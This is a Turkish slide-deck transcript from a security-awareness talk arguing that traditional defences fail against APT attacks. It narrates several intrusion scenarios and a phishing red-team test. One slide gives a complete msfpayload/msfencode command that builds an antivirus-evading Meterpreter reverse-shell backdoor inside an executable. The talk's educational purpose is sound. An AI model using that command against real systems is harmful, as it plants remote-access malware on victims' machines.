APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği
-
Upload
bga-bilgi-guevenligi-akademisi -
Category
Technology
-
view
787 -
download
6
description
Transcript of APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ [email protected]
APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Huzeyfe ÖNAL • Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş<rmacısı @BGA
• PenetraAon Tester • Eğitmen – Bilgi Güvenliği AKADEMİSİ – Linux AKADEMİ
• ÖğreAm Görevlisi Bilgi / Bahçeşehir Üniversitesi
• Blogger -‐ www.lifeoverip.net
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Amaç • Günümüz güvenlik problemlerinin temelini oluşturan son kullanıcı farkındalık eksikliği ve zararlı yazılımlar karşısında Firewall/IPS/AnAvirüs gibi klasik siber güvenlik sistemlerinin yetersizliğinin anlaşılması.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
!! Uyarı !!
Bu sunumda geçen tüm olaylar ve ekran görüntülerinin gerçek kişilerle ilgisi yoktur, sanal
dünyadan alınmış[r.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
10 Sene Önce Siber Dünya
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Geleneksel Güvenlik Yaklaşımı • Network, işleAm sistemi ve servis güvenliği • Router(ACL), Firewall – Intrusion DetecAon System • Intrusion PrevenAon System
» ....
• Bütçenin tamamına yakını standart savunma sistemleri için ayrılır.
• Kullanıcılara yönelik tehdit genellikle es geçilir – “...Onun zaten farkındayız” yaklaşımı
• GerçekleşArilen güvenlik testleri kontrol listesindeki bir maddeyi daha geçebilmek için yap<rılır.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Katmanlı Güvenlik Mimarisi(?) • Güvenlik ürünleri listesi – Güvenlik duvarı – Saldırı Tespit ve Engelleme Sistemi – AnAvirüs, AnAspam, AnA… – NAC, 802.1x çözümü – DLP
• Güvenliğin artması para harcama ile doğru oran<lı değildir
• Katmanlı güvenlik mimarisini yanlış anlama
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Sorularla Güvenliğimiz… • Kaç kişi/kurum son bir yıl içerisinde APT benzeri sofisAke bir saldırıya maruz kaldı
• Daha da önemlisi kaç kişi/kurum bu saldırıya maruz kaldığını tespit ej ve nasıl/ne zaman?
• Daha daha da önemlisi kaç kurum bu Ap saldırıyla karşı karşıya kaldığından habersiz?
• BGA’dan örnekleri… – Kamu / Özel sektör
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
APT Kavramı • A.P.T (Advanced Persistent Threat) 2010 yılında gündemimize girmiş “görece olarak” yeni bir konu. – Yeni arayışlar ve sektöre heyecan katmak amacıyla gelişArilmiş bir konu mu?
– Çok daha öncesinden varolan fakat yeteri kadar önem verilmeyen, büyük firmaları hedef alındığında gerçek önemi ortaya çıkan bir konu mu?
• Teknik olarak eski yöntemler, yeni moAvasyonlar • Güvenlikcilerin 0-‐3 yenik başladığı bir kavram
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
APT ile Mücadele • APT kolay tanımlanabilir bir konu olmadığı için mücadelesi de zordur,
• Mücadelede en önemli husus kime karşı neyin mücadelesinin verildiğidir – Saldırgan gibi düşünebilmek ve onların yeteneklerini simule etmek hayaA öneme sahipAr.
• Tanımlanabilir tehditleri engellemek kolaydır • Hata: Kolay tanımlanabilir olmayan riskleri eski man<kla çözmeye kalkmak… – AV firmalarının APT ile uğraşması…
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
APT Saldırı Anatomisi
Kaynak: RSA güv. konferansı
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
APT Yaşam Döngüsü Faz Ak^vite Detaylar
I. Faz Keşif, hedef belirleme Hedefin ve hedefe ulaşılabilecek yolların tespit edilmesi
II. Faz Oltalama e-‐postasının gönderilmesi
Genellikle bu yöntem tercih edilir (kolay, zahmetsiz ve az teknik detay gerekArdiğinden)
III. Faz Hedefle irAbata geçme Hedef sisteme arka kapı yükleme
IV. Faz Hak yükseltme, hedef alanını genişletme
Hedef sistemde daha yüksek yetkili kullanıcı haklarına geçiş, farklı ağları keşif
V. Faz Veri Kaçırma Hedef sistemden ilgili verilerin şifrelenerek dışarı çıkar<lması, yedeklenmesi
VI. Faz Erişimi kalıcı kılma İstenildiğinde tekrar bağlanılabilecek bir yapıyı kurup , logların ve diğer delillerin silinmesi.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
APT MoAvasyonu ve Akçeli İşler • APT saldırılarında en önemli bileşen saldırganın moAvasyonudur. – Bu moAvasyon genellikle maddi karşılık<r.
• Saldırganın moAvasyon durumuna göre APT saldırısı 1 gün de sürebilir 4 yıl da sürebilir. – 0 day exploit çıkması için beklenen süre v.s – Hacklenen 3. parA yazılımın güncellenmesini bekleme
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Türkiye’den İstaAsAkler
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Hatalı APT Yaklaşımları… • Bize birşey olmaz yaklaşımı – Saldırgan bula bula bizi mi bulacakJ
• Sadece ürünle çözmeye çalışmak • Sadece ağ trafiği dinleyerek çözmeye çalışmak • Farkındalık+APT ürünü+log yöneAmi+offsec
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Örnek APT Senaryo İncelemeleri
1 2
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Senaryo-‐I • Sebep:Farkındalık ve son kullanıcı güvenlik önlemlerinin yetersiz olması
• Hikaye: Saldırgan ipsec VPN kullanan firmaları hedef alarak erişim bilgilerini toplayarak bunları satmak ister. Bunun için bir adet tuzak sistem kurar (kurulu sistemi hackler) ve arama motorları sonuçlarına güvenen son kullanıcıları avlamaya başlar.
• Günün sonunda başladığı yerden bir mil ötede hiç hesaba katmadığı firmaların iç ağlarına erişip hassas çizimleri başkalarına para karşılığında satar
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
• Senaryo internet üzerinden bir exe dosyasının indirilmesi ile başlar – Internet üzerinden exe yasaklanabilir (?)
• Senaryodaki .exe yerine .pdf, .zip, xls, .doc ve benzeri uzan<lar kullanılabilir veya uzan<ya gerek olmadan yeni çıkmış 0 day açıklardan biri kullanılarak Explorer ve benzeri browserlar üzerinden işlem yap<rılabilir.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Keşif, Bilgi Toplama ve Tuzak Adımı • Saldırgan Google kullanarak VPN istemcisi ara<r ve ilk sayfada çıkan linke <klayarak programı indirir
• Bilgisayarına programı kurar ve VPN bağlan<sını başla<r.
• Saldırgan program çalış<ğında son kullanıcı bilgisayarına erişim sağlar
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
İlk Adım Zorlukları • Google’da ilk sayfada çıkan sistemin hacklenmesi – SSL heartbleed açıklığı sonrası durum
• İlk sayfada çıkan sistem hacklenemiyorsa yeni bir site kurup Black Seo yöntemleri ile ilk sayfaya alınması
• Hemen her gün yeni güvenlik zafiyetleri yayınlanır
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
VPN İstemci Programına Arka kapı YerleşArme • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.106 R | msfencode -‐t exe -‐x template_x86_windows.exe -‐k -‐o nt_backdoor.exe -‐e x86/shikata_ga_nai -‐c 5
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
AnA-‐(Virus/Malware/…) Atlatma Özelliği Ekleme
• Klasik güvenlik korumaları Aspirin gibidir. Bilinen basit durumlar için işe yarar.
• ÜreAlen zararlı yazılımların %80 civarının yaşam süresi 3 saajr. Bunun içinde tek kullanımlık malware oranı %70’dir.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
AV’ler Tara}ndan Tanınmaz Zararlı Oluşturma
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Örnek Uygulama Çık<sı
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Bekleme Süresi • APT saldırılarında en önemli hususlardan biri saldırganın acelesinin olmamasıdır.
• Saldırgan ağını hazırlar, kurar ve uzun bir süre bekler.
• Örnek senaryoda 6 ay civarında bir bekleme süresi olduğu tespit edilmişAr.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Hassas Bilgilerin Elde Edilmesi
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
FTP Erişimi ve FTP’deki Dosyalara Arka Kapı YerleşArme
• Saldırgan elde ejği erişim bilgilerini kullanarak FTP sunucuya bağlanır ve FTP sunucuda en son güncellenen dosyaları inceleyerek orjinallerini arka kapılı sürümleriyle değişArir.
• 3 gün sonra ip adresi X.y.z.t’li bir istemcinin merkezi komuta sistemine bağlandığını görür.
• Hızlıca ilgili kullanıcının bilgisayarına erişim sağlar • Bilgisayar firmanın help desk birimi çalışanına aijr ve en yetkili kullanıcı hesabı bilgisayara login olmuştur.
• Bellek dökümü yaparak parolanın açık hali elde edilir
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Sunucu Taraflı bir APT • Saldırgan çok bilinen bir blog/cms sisteminin Türkiye sitesini hackler – Parola tahmini
• Bir sonraki sürüm için zaman sayar ve yeni sürüm çık<ğında siteye eklenen yeni Türkçe sürüm dosyaları içine bir adet arka kapı barındıran php dosyası ekler, hash değerlerini değişArir.
• Bir ha�a sonra ilgili dosyanın download sayısı 173.000 olmuştur.
• Saldırgan tek bir harekeA ile 173.000 sisteme arka kapı bırakır.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Apt devam… • Sunucu loglarından ilgili dosyaları indiren ip adresleri tespit edilip hangilerinde blog yazılımı kurulu belirlenir ve arka kapıların hangi sistemlerde olduğu tespit edilir.
• Arka kapı üzerinden sunucu ele geçirilir – Windows uzerinde Apache Admin hakları ile çalışmaktadır
• DMZ bölgesindeki diger sunuculara PassThe Hash yöntemi ile erişim sağlanır ve veritabanı sunucusundan yerel ağa erişilir…
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Türkiye’den Örnek APT TesA ve Sonucu • Firma ile anlaşma yapılır – Gizlilik sözleşmesinde geçen firma ismi hariç hiç bilgi alınmamış<r.
– Sosyal ağ sitelerinden araş<rma yapılarak hedef 50 kişi belirlenir. (LinkedIN)
– Firmanın twi�er/facebook sayfaları takip edilerek kampanya/duyuru zamanı beklenir.
– Kampanya ile ilgili siteye benzer alan adı alınarak SPF kayıtları, MX kayıtları girilir ve sahte e-‐posta hazırlanır.
• 50 çalışana e-‐posta gönderilir ve beklemeye alınır.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
• Ilk 10 dakika içinde 7 kullanıcı sisteme erişmeye çalışır. • Hızlıca kullanıcıların hesap bilgileri kullanılarak webmail sistemine erişim sağlanır – Tüm kullanıcı bilgisi alınır (bağlı olunan birim ve tel numaraları dahil)
• Anahtar kelime araması gerçekleşArilir (*.pcf) • Bir adet vpn config ve user/pass elde edilir • Vpn kurulumu icin gece 03:00 beklenir • VPN kurulur yerel ağa bağlan< sağlanır, RDP üzerinden parolası alınan bilgisayara bağlanılır.
• AV durduruldu, kalıcı arka kapı yüklendi, yerel ağ portları tarandı DB bulundu, erişim sağlandı…
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Kuruma Ödev • Testleri tamamladıktan sonra saldırı tespit ve engelleme sistemini uyaracak çeşitli sahte ataklar düzenlendi.
• Kuruma bir ha�a içerisinde gerçekleşArilen siber saldırı simulasyonu sonucunda eldeki bulguları soruldu – IPS logları haric elle tutulur hicbir bilgi gelmedi.
• Kısacası kurum yap<ğı milyon dolarlık ya<rımın gerçek bir APT saldırısı karşısında kendisini savunamayacağını gördü…
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
Sonuç • Siber dünyada güvenliğimiz sadece bize ve sınırlarımıza bağlı değildir.
• Özellikle hizmet alınan 3. parA firmalar ve bunların erişimleri/yetkileri büyük problemdir.
• Internet üzerinden elde edilen veya yerel ağda dolaşımda olan her tür çalış<rılabilir dosya kontrolden geçmeli.
• APT teknik bir problemden öte iş dünyasını ilgilendiren hassas bir konudur.
Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR
İleAşim Bilgileri
• www.lifeoverip.net • Blog.bga.com.tr Blog
• @bgasecurity • @huzeyfeonal Twi�er
• [email protected] • [email protected] İleAşim